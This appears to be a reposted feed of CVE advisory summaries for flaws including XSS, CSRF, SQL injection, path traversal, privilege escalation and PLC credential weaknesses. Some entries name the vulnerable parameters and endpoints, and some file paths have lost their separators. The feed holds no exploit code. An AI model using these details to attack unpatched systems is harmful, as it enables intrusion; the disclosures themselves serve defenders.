CVE-2020-18693
Cross Site Scripting (XSS) in MineWebCMS v1.7.0 allows remote attackers to execute arbitrary code by injecting malicious code into the ‘Title’ field of the component ‘/admin/news’.
Source: CVE-2020-18693
CVE-2020-18693
Cross Site Scripting (XSS) in MineWebCMS v1.7.0 allows remote attackers to execute arbitrary code by injecting malicious code into the ‘Title’ field of the component ‘/admin/news’.
Source: CVE-2020-18693
CVE-2020-18694
Cross Site Request Forgery (CSRF) in IgnitedCMS v1.0 allows remote attackers to obtain sensitive information and gain privilege via the component "/admin/profile/save_profile".
Source: CVE-2020-18694
CVE-2021-20597
Insufficiently Protected Credentials vulnerability in Mitsubishi Electric MELSEC iQ-R series CPU modules (R08/16/32/120SFCPU all versions, R08/16/32/120PSFCPU all versions) allows a remote unauthenticated attacker to login to the target unauthorizedly by sniffing network traffic and obtaining credentials when registering user information in the target or changing a password.
Source: CVE-2021-20597
CVE-2021-36795
A permission issue in the Cohesity Linux agent may allow privilege escalation in version 6.5.1b to 6.5.1d-hotfix10, 6.6.0a to 6.6.0b-hotfix1. An underprivileged linux user, if certain environment criteria are met, can gain additional privileges.
Source: CVE-2021-36795
CVE-2021-20598
Overly Restrictive Account Lockout Mechanism vulnerability in Mitsubishi Electric MELSEC iQ-R series CPU modules (R08/16/32/120SFCPU all versions, R08/16/32/120PSFCPU all versions) allows a remote unauthenticated attacker to lockout a legitimate user by continuously trying login with incorrect password.
Source: CVE-2021-20598
CVE-2021-20594
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Mitsubishi Electric MELSEC iQ-R series CPU modules (R08/16/32/120SFCPU all versions, R08/16/32/120PSFCPU all versions) allows a remote unauthenticated attacker to acquire legitimate user names registered in the module via brute-force attack on user names.
Source: CVE-2021-20594
CVE-2021-36455
SQL Injection vulnerability in Naviwebs Navigate CMS 2.9 via the quicksearch parameter in libpackagescommentscomments.php.
Source: CVE-2021-36455
CVE-2021-36454
Cross Site Scripting (XSS) vulnerability in Naviwebs Navigate Cms 2.9 via the navigate-quickse parameter to 1) backupsbackups.php, 2) blocksblocks.php, 3) brandsbrands.php, 4) commentscomments.php, 5) couponscoupons.php, 6) feedsfeeds.php, 7) functionsfunctions.php, 8) itemsitems.php, 9) menusmenus.php, 10) ordersorders.php, 11) payment_methodspayment_methods.php, 12) productsproducts.php, 13) profilesprofiles.php, 14) shipping_methodsshipping_methods.php, 15) templatestemplates.php, 16) usersusers.php, 17) webdictionarywebdictionary.php, 18) websiteswebsites.php, and 19) webuserswebusers.php because the initial_url function is built in these files.
Source: CVE-2021-36454
CVE-2021-38137
Corero SecureWatch Managed Services 9.7.2.0020 does not correctly check swa-monitor and cns-monitor user’s privileges, allowing a user to perform actions not belonging to his role.
Source: CVE-2021-38137
CVE-2021-38136
Corero SecureWatch Managed Services 9.7.2.0020 is affected by a Path Traversal vulnerability via the snap_file parameter in the /it-IT/splunkd/__raw/services/get_snapshot HTTP API endpoint. A ‘low privileged’ attacker can read any file on the target host.
Source: CVE-2021-38136